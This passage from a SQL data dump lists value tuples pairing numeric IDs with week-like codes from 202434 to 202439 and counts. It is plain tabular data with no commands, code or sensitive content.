1,'202434',1),(3038,1,'202434',1),(3045,1,'202434',1),(3063,1,'202434',1),(3066,1,'202434',1),(3083,1,'202434',1),(3092,1,'202434',1),(3097,1,'202434',1),(3107,1,'202434',1),(3124,1,'202434',1),(3127,1,'202434',1),(3226,1,'202434',1),(3245,1,'202434',1),(3249,1,'202434',1),(3253,1,'202434',1),(3261,1,'202434',1),(3263,1,'202434',1),(3269,1,'202434',1),(3271,1,'202434',1),(3273,1,'202434',1),(3280,1,'202434',1),(3282,1,'202434',1),(3285,1,'202434',1),(3313,1,'202434',1),(3430,1,'202434',1),(3438,1,'202434',1),(3479,1,'202434',1),(3486,1,'202434',1),(3498,1,'202434',1),(3534,1,'202434',1),(3714,1,'202434',1),(3724,1,'202434',1),(3727,1,'202434',1),(3735,1,'202434',1),(3738,1,'202434',1),(3742,1,'202434',1),(3746,1,'202434',1),(3774,1,'202434',1),(4275,1,'202434',1),(4301,1,'202434',1),(4326,1,'202434',1),(4332,1,'202434',1),(4335,1,'202434',1),(4338,1,'202434',1),(4341,1,'202434',1),(4363,1,'202434',1),(4368,1,'202434',1),(4373,1,'202434',1),(4382,1,'202434',1),(4391,1,'202434',1),(4396,1,'202434',1),(4400,1,'202434',1),(4408,1,'202434',1),(4424,1,'202434',1),(4428,1,'202434',1),(4432,1,'202434',1),(4440,1,'202434',1),(4448,1,'202434',1),(4520,1,'202434',1),(4524,1,'202434',1),(4546,1,'202434',1),(4591,1,'202434',1),(4608,1,'202434',1),(4612,1,'202434',1),(4648,1,'202434',1),(4651,1,'202434',1),(4657,1,'202434',1),(4663,1,'202434',1),(4674,1,'202434',1),(4677,1,'202434',1),(4681,1,'202434',1),(4688,1,'202434',1),(4694,1,'202434',1),(4700,1,'202434',1),(4703,1,'202434',1),(4706,1,'202434',1),(4712,1,'202434',1),(4722,1,'202434',1),(4744,1,'202434',1),(4747,1,'202434',1),(4762,1,'202434',1),(4776,1,'202434',1),(4797,1,'202434',1),(4802,1,'202434',1),(4858,1,'202434',1),(4866,1,'202434',1),(4874,1,'202434',1),(4883,1,'202434',1),(4888,1,'202434',1),(4976,1,'202434',1),(4977,1,'202434',1),(4980,1,'202434',1),(4983,1,'202434',1),(4988,1,'202434',1),(5024,1,'202434',1),(5028,1,'202434',1),(5046,1,'202434',1),(5050,1,'202434',1),(5054,1,'202434',1),(5067,1,'202434',1),(5071,1,'202434',1),(5080,1,'202434',1),(5122,1,'202434',1),(5128,1,'202434',1),(5134,1,'202434',1),(5140,1,'202434',1),(5146,1,'202434',1),(5153,1,'202434',1),(5163,1,'202434',1),(5259,1,'202434',1),(5271,1,'202434',1),(5280,1,'202434',1),(5289,1,'202434',1),(5292,1,'202434',1),(5295,1,'202434',1),(5298,1,'202434',1),(5301,1,'202434',1),(5304,1,'202434',1),(5307,1,'202434',1),(5310,1,'202434',1),(5317,1,'202434',1),(5323,1,'202434',1),(5326,1,'202434',1),(5330,1,'202434',1),(5359,1,'202434',1),(5363,1,'202434',1),(5378,1,'202434',1),(102,1,'202434',2),(108,1,'202434',2),(110,1,'202434',2),(469,1,'202434',2),(470,1,'202434',2),(476,1,'202434',2),(479,1,'202434',2),(484,1,'202434',2),(486,1,'202434',2),(488,1,'202434',2),(1592,1,'202434',2),(1594,1,'202434',2),(1598,1,'202434',2),(1614,1,'202434',2),(1715,1,'202434',2),(1718,1,'202434',2),(1730,1,'202434',2),(1770,1,'202434',2),(2150,1,'202434',2),(2165,1,'202434',2),(2309,1,'202434',2),(2609,1,'202434',2),(2704,1,'202434',2),(2748,1,'202434',2),(2989,1,'202434',2),(3004,1,'202434',2),(3023,1,'202434',2),(3030,1,'202434',2),(3041,1,'202434',2),(3072,1,'202434',2),(3087,1,'202434',2),(3104,1,'202434',2),(3109,1,'202434',2),(3117,1,'202434',2),(3265,1,'202434',2),(3290,1,'202434',2),(3482,1,'202434',2),(3752,1,'202434',2),(4412,1,'202434',2),(4741,1,'202434',2),(4756,1,'202434',2),(4759,1,'202434',2),(4930,1,'202434',2),(4996,1,'202434',2),(5020,1,'202434',2),(5058,1,'202434',2),(5137,1,'202434',2),(5157,1,'202434',2),(5253,1,'202434',2),(5256,1,'202434',2),(5264,1,'202434',2),(5314,1,'202434',2),(471,1,'202434',3),(482,1,'202434',3),(487,1,'202434',3),(1588,1,'202434',3),(1590,1,'202434',3),(1608,1,'202434',3),(1610,1,'202434',3),(1734,1,'202434',3),(1749,1,'202434',3),(1751,1,'202434',3),(1776,1,'202434',3),(2161,1,'202434',3),(2178,1,'202434',3),(2457,1,'202434',3),(2503,1,'202434',3),(2617,1,'202434',3),(2769,1,'202434',3),(2775,1,'202434',3),(2911,1,'202434',3),(2964,1,'202434',3),(3006,1,'202434',3),(3243,1,'202434',3),(3257,1,'202434',3),(3259,1,'202434',3),(3267,1,'202434',3),(3278,1,'202434',3),(3287,1,'202434',3),(3531,1,'202434',3),(3541,1,'202434',3),(3710,1,'202434',3),(3771,1,'202434',3),(4323,1,'202434',3),(4377,1,'202434',3),(4416,1,'202434',3),(4517,1,'202434',3),(4582,1,'202434',3),(4654,1,'202434',3),(4870,1,'202434',3),(5033,1,'202434',3),(5037,1,'202434',3),(5076,1,'202434',3),(5131,1,'202434',3),(5248,1,'202434',3),(335,1,'202434',4),(468,1,'202434',4),(477,1,'202434',4),(483,1,'202434',4),(485,1,'202434',4),(1586,1,'202434',4),(1600,1,'202434',4),(3102,1,'202434',4),(3275,1,'202434',4),(3764,1,'202434',4),(4420,1,'202434',4),(4457,1,'202434',4),(4551,1,'202434',4),(4709,1,'202434',4),(5276,1,'202434',4),(481,1,'202434',5),(1544,1,'202434',5),(1596,1,'202434',5),(1602,1,'202434',5),(1743,1,'202434',5),(2904,1,'202434',5),(2965,1,'202434',5),(2991,1,'202434',5),(3005,1,'202434',5),(3096,1,'202434',5),(4668,1,'202434',5),(4765,1,'202434',5),(89,1,'202434',6),(1766,1,'202434',6),(2252,1,'202434',6),(3316,1,'202434',6),(5062,1,'202434',7),(1582,1,'202434',8),(3247,1,'202434',9),(3060,1,'202434',10),(3781,1,'202434',11),(72,1,'202434',12),(2148,1,'202434',12),(68,1,'202434',29),(80,1,'202434',59),(9,1,'202434',11849),(76,1,'202435',1),(480,1,'202435',1),(1730,1,'202435',1),(1737,1,'202435',1),(1741,1,'202435',1),(1749,1,'202435',1),(1766,1,'202435',1),(2154,1,'202435',1),(2297,1,'202435',1),(2658,1,'202435',1),(2748,1,'202435',1),(2956,1,'202435',1),(2991,1,'202435',1),(3087,1,'202435',1),(3090,1,'202435',1),(3096,1,'202435',1),(3257,1,'202435',1),(3269,1,'202435',1),(3271,1,'202435',1),(3278,1,'202435',1),(3316,1,'202435',1),(3479,1,'202435',1),(3486,1,'202435',1),(3531,1,'202435',1),(3727,1,'202435',1),(3731,1,'202435',1),(3749,1,'202435',1),(4404,1,'202435',1),(4416,1,'202435',1),(4424,1,'202435',1),(4444,1,'202435',1),(4514,1,'202435',1),(4520,1,'202435',1),(4542,1,'202435',1),(4556,1,'202435',1),(4648,1,'202435',1),(4660,1,'202435',1),(4674,1,'202435',1),(4681,1,'202435',1),(4688,1,'202435',1),(4706,1,'202435',1),(4712,1,'202435',1),(4750,1,'202435',1),(4753,1,'202435',1),(4756,1,'202435',1),(4768,1,'202435',1),(4858,1,'202435',1),(4866,1,'202435',1),(4976,1,'202435',1),(4988,1,'202435',1),(5067,1,'202435',1),(5071,1,'202435',1),(5122,1,'202435',1),(5125,1,'202435',1),(5137,1,'202435',1),(5157,1,'202435',1),(5256,1,'202435',1),(5289,1,'202435',1),(5292,1,'202435',1),(5295,1,'202435',1),(5298,1,'202435',1),(5310,1,'202435',1),(5317,1,'202435',1),(5363,1,'202435',1),(5383,1,'202435',1),(87,1,'202435',2),(91,1,'202435',2),(110,1,'202435',2),(476,1,'202435',2),(477,1,'202435',2),(478,1,'202435',2),(481,1,'202435',2),(482,1,'202435',2),(483,1,'202435',2),(488,1,'202435',2),(1584,1,'202435',2),(1590,1,'202435',2),(1608,1,'202435',2),(1610,1,'202435',2),(1703,1,'202435',2),(1707,1,'202435',2),(1720,1,'202435',2),(1780,1,'202435',2),(1782,1,'202435',2),(2152,1,'202435',2),(2156,1,'202435',2),(2165,1,'202435',2),(2558,1,'202435',2),(2964,1,'202435',2),(3006,1,'202435',2),(3034,1,'202435',2),(3092,1,'202435',2),(3104,1,'202435',2),(3107,1,'202435',2),(3229,1,'202435',2),(3240,1,'202435',2),(3243,1,'202435',2),(3245,1,'202435',2),(3287,1,'202435',2),(3498,1,'202435',2),(3534,1,'202435',2),(3724,1,'202435',2),(3746,1,'202435',2),(4335,1,'202435',2),(4363,1,'202435',2),(4396,1,'202435',2),(4400,1,'202435',2),(4432,1,'202435',2),(4436,1,'202435',2),(4546,1,'202435',2),(4762,1,'202435',2),(4771,1,'202435',2),(4870,1,'202435',2),(5033,1,'202435',2),(5037,1,'202435',2),(5046,1,'202435',2),(5054,1,'202435',2),(5101,1,'202435',2),(5140,1,'202435',2),(5314,1,'202435',2),(5353,1,'202435',2),(5359,1,'202435',2),(74,1,'202435',3),(84,1,'202435',3),(470,1,'202435',3),(472,1,'202435',3),(1596,1,'202435',3),(1604,1,'202435',3),(1695,1,'202435',3),(1715,1,'202435',3),(1722,1,'202435',3),(2063,1,'202435',3),(2161,1,'202435',3),(2751,1,'202435',3),(2769,1,'202435',3),(2775,1,'202435',3),(2965,1,'202435',3),(3041,1,'202435',3),(3102,1,'202435',3),(3251,1,'202435',3),(3261,1,'202435',3),(3265,1,'202435',3),(3738,1,'202435',3),(3764,1,'202435',3),(4454,1,'202435',3),(4529,1,'202435',3),(4582,1,'202435',3),(4685,1,'202435',3),(4697,1,'202435',3),(4792,1,'202435',3),(4897,1,'202435',3),(5062,1,'202435',3),(479,1,'202435',4),(485,1,'202435',4),(570,1,'202435',4),(1588,1,'202435',4),(1592,1,'202435',4),(1612,1,'202435',4),(1718,1,'202435',4),(1743,1,'202435',4),(1770,1,'202435',4),(1776,1,'202435',4),(2252,1,'202435',4),(2617,1,'202435',4),(2813,1,'202435',4),(3004,1,'202435',4),(3005,1,'202435',4),(3023,1,'202435',4),(3079,1,'202435',4),(4238,1,'202435',4),(4391,1,'202435',4),(4412,1,'202435',4),(4457,1,'202435',4),(4759,1,'202435',4),(4776,1,'202435',4),(4930,1,'202435',4),(469,1,'202435',5),(471,1,'202435',5),(484,1,'202435',5),(486,1,'202435',5),(1586,1,'202435',5),(1600,1,'202435',5),(1614,1,'202435',5),(2457,1,'202435',5),(3226,1,'202435',5),(4420,1,'202435',5),(4694,1,'202435',5),(4996,1,'202435',5),(5076,1,'202435',5),(473,1,'202435',6),(487,1,'202435',6),(1544,1,'202435',6),(1582,1,'202435',6),(1598,1,'202435',6),(1711,1,'202435',6),(2309,1,'202435',6),(2801,1,'202435',6),(4301,1,'202435',6),(5146,1,'202435',6),(467,1,'202435',7),(474,1,'202435',7),(1594,1,'202435',7),(1774,1,'202435',7),(3030,1,'202435',7),(3060,1,'202435',7),(3247,1,'202435',7),(4888,1,'202435',7),(468,1,'202435',8),(1602,1,'202435',8),(3781,1,'202435',9),(2148,1,'202435',11),(72,1,'202435',12),(89,1,'202435',12),(68,1,'202435',45),(80,1,'202435',51),(9,1,'202435',24440),(335,1,'202436',1),(478,1,'202436',1),(1590,1,'202436',1),(1610,1,'202436',1),(1701,1,'202436',1),(1703,1,'202436',1),(1711,1,'202436',1),(1730,1,'202436',1),(1741,1,'202436',1),(1747,1,'202436',1),(1782,1,'202436',1),(2154,1,'202436',1),(2252,1,'202436',1),(2296,1,'202436',1),(2813,1,'202436',1),(2964,1,'202436',1),(3038,1,'202436',1),(3041,1,'202436',1),(3072,1,'202436',1),(3102,1,'202436',1),(3245,1,'202436',1),(3267,1,'202436',1),(3307,1,'202436',1),(3482,1,'202436',1),(3735,1,'202436',1),(3738,1,'202436',1),(3777,1,'202436',1),(4301,1,'202436',1),(4338,1,'202436',1),(4373,1,'202436',1),(4524,1,'202436',1),(4529,1,'202436',1),(4542,1,'202436',1),(4582,1,'202436',1),(4651,1,'202436',1),(4660,1,'202436',1),(4668,1,'202436',1),(4674,1,'202436',1),(4709,1,'202436',1),(4747,1,'202436',1),(4753,1,'202436',1),(4756,1,'202436',1),(4759,1,'202436',1),(4765,1,'202436',1),(4976,1,'202436',1),(5024,1,'202436',1),(5028,1,'202436',1),(5131,1,'202436',1),(5134,1,'202436',1),(5280,1,'202436',1),(5374,1,'202436',1),(84,1,'202436',2),(87,1,'202436',2),(91,1,'202436',2),(471,1,'202436',2),(1588,1,'202436',2),(1592,1,'202436',2),(1606,1,'202436',2),(1608,1,'202436',2),(1695,1,'202436',2),(1707,1,'202436',2),(1718,1,'202436',2),(1728,1,'202436',2),(1768,1,'202436',2),(1776,1,'202436',2),(1780,1,'202436',2),(2063,1,'202436',2),(2248,1,'202436',2),(2293,1,'202436',2),(2658,1,'202436',2),(2956,1,'202436',2),(2991,1,'202436',2),(2993,1,'202436',2),(3023,1,'202436',2),(3027,1,'202436',2),(3030,1,'202436',2),(3092,1,'202436',2),(3107,1,'202436',2),(3240,1,'202436',2),(3249,1,'202436',2),(3257,1,'202436',2),(3261,1,'202436',2),(3285,1,'202436',2),(3316,1,'202436',2),(3430,1,'202436',2),(3479,1,'202436',2),(3498,1,'202436',2),(3746,1,'202436',2),(4357,1,'202436',2),(4416,1,'202436',2),(4520,1,'202436',2),(4546,1,'202436',2),(4551,1,'202436',2),(4566,1,'202436',2),(4612,1,'202436',2),(4694,1,'202436',2),(4771,1,'202436',2),(4776,1,'202436',2),(4866,1,'202436',2),(4930,1,'202436',2),(4996,1,'202436',2),(5020,1,'202436',2),(5042,1,'202436',2),(5046,1,'202436',2),(5062,1,'202436',2),(5080,1,'202436',2),(5101,1,'202436',2),(5248,1,'202436',2),(468,1,'202436',3),(473,1,'202436',3),(474,1,'202436',3),(570,1,'202436',3),(1544,1,'202436',3),(1602,1,'202436',3),(1614,1,'202436',3),(1715,1,'202436',3),(1726,1,'202436',3),(2309,1,'202436',3),(2904,1,'202436',3),(3004,1,'202436',3),(3005,1,'202436',3),(3006,1,'202436',3),(3045,1,'202436',3),(3079,1,'202436',3),(3096,1,'202436',3),(3109,1,'202436',3),(3263,1,'202436',3),(3489,1,'202436',3),(3731,1,'202436',3),(4329,1,'202436',3),(4377,1,'202436',3),(4448,1,'202436',3),(4454,1,'202436',3),(4517,1,'202436',3),(4685,1,'202436',3),(5054,1,'202436',3),(5314,1,'202436',3),(5359,1,'202436',3),(479,1,'202436',4),(1600,1,'202436',4),(1612,1,'202436',4),(1722,1,'202436',4),(1743,1,'202436',4),(1749,1,'202436',4),(1766,1,'202436',4),(2297,1,'202436',4),(2609,1,'202436',4),(2775,1,'202436',4),(3087,1,'202436',4),(3090,1,'202436',4),(3226,1,'202436',4),(3280,1,'202436',4),(3727,1,'202436',4),(4420,1,'202436',4),(4457,1,'202436',4),(4645,1,'202436',4),(5298,1,'202436',4),(469,1,'202436',5),(484,1,'202436',5),(1594,1,'202436',5),(2558,1,'202436',5),(2751,1,'202436',5),(2801,1,'202436',5),(5076,1,'202436',5),(5301,1,'202436',5),(76,1,'202436',6),(470,1,'202436',6),(2617,1,'202436',6),(3063,1,'202436',6),(3247,1,'202436',6),(4391,1,'202436',6),(4412,1,'202436',6),(4870,1,'202436',6),(89,1,'202436',7),(467,1,'202436',7),(3060,1,'202436',7),(480,1,'202436',8),(1774,1,'202436',8),(3781,1,'202436',8),(1582,1,'202436',9),(72,1,'202436',11),(2148,1,'202436',12),(68,1,'202436',41),(80,1,'202436',46),(9,1,'202436',19249),(335,1,'202437',1),(468,1,'202437',1),(471,1,'202437',1),(481,1,'202437',1),(485,1,'202437',1),(570,1,'202437',1),(1544,1,'202437',1),(1592,1,'202437',1),(1602,1,'202437',1),(1606,1,'202437',1),(1610,1,'202437',1),(1707,1,'202437',1),(1711,1,'202437',1),(1713,1,'202437',1),(1741,1,'202437',1),(1749,1,'202437',1),(1768,1,'202437',1),(1776,1,'202437',1),(1780,1,'202437',1),(2150,1,'202437',1),(2156,1,'202437',1),(2165,1,'202437',1),(2252,1,'202437',1),(2296,1,'202437',1),(2609,1,'202437',1),(2704,1,'202437',1),(2956,1,'202437',1),(2964,1,'202437',1),(2991,1,'202437',1),(3072,1,'202437',1),(3079,1,'202437',1),(3087,1,'202437',1),(3102,1,'202437',1),(3127,1,'202437',1),(3229,1,'202437',1),(3249,1,'202437',1),(3261,1,'202437',1),(3271,1,'202437',1),(3278,1,'202437',1),(3280,1,'202437',1),(3479,1,'202437',1),(3531,1,'202437',1),(3534,1,'202437',1),(3727,1,'202437',1),(3738,1,'202437',1),(3746,1,'202437',1),(3749,1,'202437',1),(3752,1,'202437',1),(3774,1,'202437',1),(4301,1,'202437',1),(4368,1,'202437',1),(4377,1,'202437',1),(4404,1,'202437',1),(4416,1,'202437',1),(4428,1,'202437',1),(4432,1,'202437',1),(4457,1,'202437',1),(4514,1,'202437',1),(4524,1,'202437',1),(4529,1,'202437',1),(4556,1,'202437',1),(4612,1,'202437',1),(4654,1,'202437',1),(4657,1,'202437',1),(4660,1,'202437',1),(4668,1,'202437',1),(4677,1,'202437',1),(4685,1,'202437',1),(4691,1,'202437',1),(4712,1,'202437',1),(4722,1,'202437',1),(4756,1,'202437',1),(4762,1,'202437',1),(4765,1,'202437',1),(4768,1,'202437',1),(4792,1,'202437',1),(4797,1,'202437',1),(4802,1,'202437',1),(4888,1,'202437',1),(4996,1,'202437',1),(5020,1,'202437',1),(5028,1,'202437',1),(5058,1,'202437',1),(5071,1,'202437',1),(5076,1,'202437',1),(5101,1,'202437',1),(5122,1,'202437',1),(5125,1,'202437',1),(5128,1,'202437',1),(5134,1,'202437',1),(5146,1,'202437',1),(5256,1,'202437',1),(5268,1,'202437',1),(5271,1,'202437',1),(5289,1,'202437',1),(5298,1,'202437',1),(5317,1,'202437',1),(5326,1,'202437',1),(87,1,'202437',2),(91,1,'202437',2),(479,1,'202437',2),(480,1,'202437',2),(482,1,'202437',2),(1582,1,'202437',2),(1586,1,'202437',2),(1590,1,'202437',2),(1596,1,'202437',2),(1600,1,'202437',2),(1695,1,'202437',2),(1701,1,'202437',2),(1705,1,'202437',2),(1724,1,'202437',2),(1726,1,'202437',2),(1728,1,'202437',2),(1732,1,'202437',2),(1743,1,'202437',2),(2063,1,'202437',2),(2159,1,'202437',2),(2558,1,'202437',2),(2617,1,'202437',2),(2813,1,'202437',2),(2904,1,'202437',2),(3023,1,'202437',2),(3038,1,'202437',2),(3045,1,'202437',2),(3083,1,'202437',2),(3090,1,'202437',2),(3104,1,'202437',2),(3240,1,'202437',2),(3245,1,'202437',2),(3253,1,'202437',2),(3259,1,'202437',2),(3282,1,'202437',2),(3285,1,'202437',2),(3297,1,'202437',2),(3307,1,'202437',2),(3313,1,'202437',2),(3430,1,'202437',2),(3482,1,'202437',2),(3498,1,'202437',2),(3721,1,'202437',2),(3724,1,'202437',2),(4382,1,'202437',2),(4412,1,'202437',2),(4551,1,'202437',2),(4651,1,'202437',2),(4663,1,'202437',2),(4681,1,'202437',2),(4697,1,'202437',2),(4741,1,'202437',2),(4874,1,'202437',2),(4977,1,'202437',2),(5024,1,'202437',2),(5054,1,'202437',2),(5131,1,'202437',2),(5153,1,'202437',2),(5248,1,'202437',2),(5304,1,'202437',2),(5310,1,'202437',2),(5314,1,'202437',2),(84,1,'202437',3),(470,1,'202437',3),(472,1,'202437',3),(477,1,'202437',3),(478,1,'202437',3),(484,1,'202437',3),(488,1,'202437',3),(1594,1,'202437',3),(1604,1,'202437',3),(1703,1,'202437',3),(1718,1,'202437',3),(1720,1,'202437',3),(1766,1,'202437',3),(2293,1,'202437',3),(2297,1,'202437',3),(2309,1,'202437',3),(2503,1,'202437',3),(2801,1,'202437',3),(2911,1,'202437',3),(2965,1,'202437',3),(2993,1,'202437',3),(3004,1,'202437',3),(3066,1,'202437',3),(3069,1,'202437',3),(3092,1,'202437',3),(3438,1,'202437',3),(3735,1,'202437',3),(4238,1,'202437',3),(4326,1,'202437',3),(4332,1,'202437',3),(4391,1,'202437',3),(4400,1,'202437',3),(4566,1,'202437',3),(4582,1,'202437',3),(4591,1,'202437',3),(4645,1,'202437',3),(4771,1,'202437',3),(4976,1,'202437',3),(5264,1,'202437',3),(5292,1,'202437',3),(72,1,'202437',4),(476,1,'202437',4),(1588,1,'202437',4),(2775,1,'202437',4),(2809,1,'202437',4),(2989,1,'202437',4),(3006,1,'202437',4),(3060,1,'202437',4),(3096,1,'202437',4),(4517,1,'202437',4),(4759,1,'202437',4),(4776,1,'202437',4),(4930,1,'202437',4),(5374,1,'202437',4),(1598,1,'202437',5),(2154,1,'202437',5),(3257,1,'202437',5),(3777,1,'202437',5),(1614,1,'202437',6),(1747,1,'202437',6),(3764,1,'202437',6),(89,1,'202437',7),(1608,1,'202437',8),(3781,1,'202437',10),(4420,1,'202437',10),(2148,1,'202437',12),(3247,1,'202437',15),(68,1,'202437',32),(80,1,'202437',70),(9,1,'202437',33565),(74,1,'202438',1),(84,1,'202438',1),(102,1,'202438',1),(467,1,'202438',1),(471,1,'202438',1),(472,1,'202438',1),(483,1,'202438',1),(1594,1,'202438',1),(1598,1,'202438',1),(1604,1,'202438',1),(1612,1,'202438',1),(1695,1,'202438',1),(1711,1,'202438',1),(1715,1,'202438',1),(1720,1,'202438',1),(1732,1,'202438',1),(1741,1,'202438',1),(1747,1,'202438',1),(1749,1,'202438',1),(1751,1,'202438',1),(1768,1,'202438',1),(1774,1,'202438',1),(1778,1,'202438',1),(1782,1,'202438',1),(2154,1,'202438',1),(2156,1,'202438',1),(2296,1,'202438',1),(2297,1,'202438',1),(2309,1,'202438',1),(2457,1,'202438',1),(2503,1,'202438',1),(2617,1,'202438',1),(2658,1,'202438',1),(2801,1,'202438',1),(2804,1,'202438',1),(2965,1,'202438',1),(3066,1,'202438',1),(3090,1,'202438',1),(3107,1,'202438',1),(3109,1,'202438',1),(3124,1,'202438',1),(3127,1,'202438',1),(3245,1,'202438',1),(3273,1,'202438',1),(3275,1,'202438',1),(3282,1,'202438',1),(3290,1,'202438',1),(3297,1,'202438',1),(3316,1,'202438',1),(3430,1,'202438',1),(3482,1,'202438',1),(3486,1,'202438',1),(3498,1,'202438',1),(3714,1,'202438',1),(3727,1,'202438',1),(3731,1,'202438',1),(3738,1,'202438',1),(3746,1,'202438',1),(3749,1,'202438',1),(3774,1,'202438',1),(4238,1,'202438',1),(4275,1,'202438',1),(4301,1,'202438',1),(4323,1,'202438',1),(4326,1,'202438',1),(4332,1,'202438',1),(4335,1,'202438',1),(4338,1,'202438',1),(4341,1,'202438',1),(4368,1,'202438',1),(4373,1,'202438',1),(4387,1,'202438',1),(4391,1,'202438',1),(4396,1,'202438',1),(4408,1,'202438',1),(4416,1,'202438',1),(4424,1,'202438',1),(4440,1,'202438',1),(4520,1,'202438',1),(4524,1,'202438',1),(4529,1,'202438',1),(4556,1,'202438',1),(4566,1,'202438',1),(4591,1,'202438',1),(4651,1,'202438',1),(4660,1,'202438',1),(4663,1,'202438',1),(4668,1,'202438',1),(4674,1,'202438',1),(4681,1,'202438',1),(4685,1,'202438',1),(4691,1,'202438',1),(4700,1,'202438',1),(4706,1,'202438',1),(4712,1,'202438',1),(4750,1,'202438',1),(4753,1,'202438',1),(4756,1,'202438',1),(4765,1,'202438',1),(4776,1,'202438',1),(4797,1,'202438',1),(4866,1,'202438',1),(4983,1,'202438',1),(4988,1,'202438',1),(5046,1,'202438',1),(5050,1,'202438',1),(5062,1,'202438',1),(5067,1,'202438',1),(5071,1,'202438',1),(5080,1,'202438',1),(5259,1,'202438',1),(5271,1,'202438',1),(5295,1,'202438',1),(5304,1,'202438',1),(5307,1,'202438',1),(5323,1,'202438',1),(5334,1,'202438',1),(5353,1,'202438',1),(5359,1,'202438',1),(5363,1,'202438',1),(5383,1,'202438',1),(76,1,'202438',2),(110,1,'202438',2),(469,1,'202438',2),(470,1,'202438',2),(473,1,'202438',2),(477,1,'202438',2),(478,1,'202438',2),(479,1,'202438',2),(480,1,'202438',2),(484,1,'202438',2),(485,1,'202438',2),(1584,1,'202438',2),(1592,1,'202438',2),(1602,1,'202438',2),(1614,1,'202438',2),(1701,1,'202438',2),(1703,1,'202438',2),(1705,1,'202438',2),(1707,1,'202438',2),(1709,1,'202438',2),(1718,1,'202438',2),(1722,1,'202438',2),(1726,1,'202438',2),(1734,1,'202438',2),(1739,1,'202438',2),(1745,1,'202438',2),(1770,1,'202438',2),(1772,1,'202438',2),(2063,1,'202438',2),(2152,1,'202438',2),(2293,1,'202438',2),(2558,1,'202438',2),(2704,1,'202438',2),(2748,1,'202438',2),(2775,1,'202438',2),(2904,1,'202438',2),(3023,1,'202438',2),(3034,1,'202438',2),(3041,1,'202438',2),(3045,1,'202438',2),(3063,1,'202438',2),(3069,1,'202438',2),(3102,1,'202438',2),(3117,1,'202438',2),(3226,1,'202438',2),(3269,1,'202438',2),(3280,1,'202438',2),(3438,1,'202438',2),(3479,1,'202438',2),(3489,1,'202438',2),(3541,1,'202438',2),(3710,1,'202438',2),(3764,1,'202438',2),(3777,1,'202438',2),(4357,1,'202438',2),(4436,1,'202438',2),(4444,1,'202438',2),(4517,1,'202438',2),(4542,1,'202438',2),(4546,1,'202438',2),(4645,1,'202438',2),(4657,1,'202438',2),(4697,1,'202438',2),(4703,1,'202438',2),(4741,1,'202438',2),(4744,1,'202438',2),(4747,1,'202438',2),(4768,1,'202438',2),(4771,1,'202438',2),(4862,1,'202438',2),(4874,1,'202438',2),(4888,1,'202438',2),(4893,1,'202438',2),(4996,1,'202438',2),(5024,1,'202438',2),(5033,1,'202438',2),(5125,1,'202438',2),(5128,1,'202438',2),(5134,1,'202438',2),(5146,1,'202438',2),(5163,1,'202438',2),(5248,1,'202438',2),(5253,1,'202438',2),(5264,1,'202438',2),(5280,1,'202438',2),(5298,1,'202438',2),(5310,1,'202438',2),(5320,1,'202438',2),(335,1,'202438',3),(468,1,'202438',3),(476,1,'202438',3),(488,1,'202438',3),(1606,1,'202438',3),(1610,1,'202438',3),(1728,1,'202438',3),(2809,1,'202438',3),(2813,1,'202438',3),(2911,1,'202438',3),(2993,1,'202438',3),(3030,1,'202438',3),(3083,1,'202438',3),(3092,1,'202438',3),(3531,1,'202438',3),(3721,1,'202438',3),(3771,1,'202438',3),(4363,1,'202438',3),(4377,1,'202438',3),(4457,1,'202438',3),(4514,1,'202438',3),(4551,1,'202438',3),(4582,1,'202438',3),(4648,1,'202438',3),(4722,1,'202438',3),(4762,1,'202438',3),(4976,1,'202438',3),(4980,1,'202438',3),(5076,1,'202438',3),(5122,1,'202438',3),(5140,1,'202438',3),(5256,1,'202438',3),(5314,1,'202438',3),(72,1,'202438',4),(87,1,'202438',4),(89,1,'202438',4),(1586,1,'202438',4),(1600,1,'202438',4),(1699,1,'202438',4),(1743,1,'202438',4),(2769,1,'202438',4),(3027,1,'202438',4),(3243,1,'202438',4),(3251,1,'202438',4),(3287,1,'202438',4),(3307,1,'202438',4),(3534,1,'202438',4),(4329,1,'202438',4),(4420,1,'202438',4),(4677,1,'202438',4),(4694,1,'202438',4),(4709,1,'202438',4),(4792,1,'202438',4),(4977,1,'202438',4),(5020,1,'202438',4),(5042,1,'202438',4),(5137,1,'202438',4),(1582,1,'202438',5),(1596,1,'202438',5),(2248,1,'202438',5),(3104,1,'202438',5),(3285,1,'202438',5),(3313,1,'202438',5),(3742,1,'202438',5),(3781,1,'202438',5),(4612,1,'202438',5),(4688,1,'202438',5),(4759,1,'202438',5),(5131,1,'202438',5),(5301,1,'202438',5),(5356,1,'202438',5),(1588,1,'202438',6),(1590,1,'202438',6),(1776,1,'202438',6),(2956,1,'202438',6),(5101,1,'202438',6),(5276,1,'202438',6),(5292,1,'202438',6),(1544,1,'202438',7),(3005,1,'202438',7),(3004,1,'202438',8),(2148,1,'202438',12),(3247,1,'202438',14),(3060,1,'202438',19),(68,1,'202438',38),(80,1,'202438',63),(9,1,'202438',37373),(74,1,'202439',1),(108,1,'202439',1),(472,1,'202439',1),(1582,1,'202439',1),(1592,1,'202439',1),(1608,1,'202439',1),(1612,1,'202439',1),(2503,1,'202439',1),(2911,1,'202439',1),(3045,1,'202439',1),(3060,1,'202439',1),(3072,1,'202439',1),(3083,1,'202439',1),(3117,1,'202439',1),(3307,1,'202439',1),(3316,1,'202439',1),(3486,1,'202439',1),(3489,1,'202439',1),(4301,1,'202439',1),(4338,1,'202439',1),(4341,1,'202439',1),(4400,1,'202439',1),(4645,1,'202439',1),(4668,1,'202439',1),(4722,1,'202439',1),(4741,1,'202439',1),(4744,1,'202439',1),(4762,1,'202439',1),(4983,1,'202439',1),(5125,1,'202439',1),(5128,1,'202439',1),(5137,1,'202439',1),(5280,1,'202439',1),(5298,1,'202439',1),(5304,1,'202439',1),(91,1,'202439',2),(477,1,'202439',2),(479,1,'202439',2),(480,1,'202439',2),(484,1,'202439',2),(486,1,'202439',2),(487,1,'202439',2),(1730,1,'202439',2),(2704,1,'202439',2),(2804,1,'202439',2),(2956,1,'202439',2),(3069,1,'202439',2),(3124,1,'202439',2),(3714,1,'202439',2),(3735,1,'202439',2),(3764,1,'202439',2),(3771,1,'202439',2),(3777,1,'202439',2),(4238,1,'202439',2),(4275,1,'202439',2),(4454,1,'202439',2),(4517,1,'202439',2),(4608,1,'202439',2),(4660,1,'202439',2),(4750,1,'202439',2),(5076,1,'202439',2),(5134,1,'202439',2),(5163,1,'202439',2),(89,1,'202439',3),(1590,1,'202439',3),(1600,1,'202439',3),(1695,1,'202439',3),(1697,1,'202439',3),(1699,1,'202439',3),(1701,1,'202439',3),(1713,1,'202439',3),(1734,1,'20243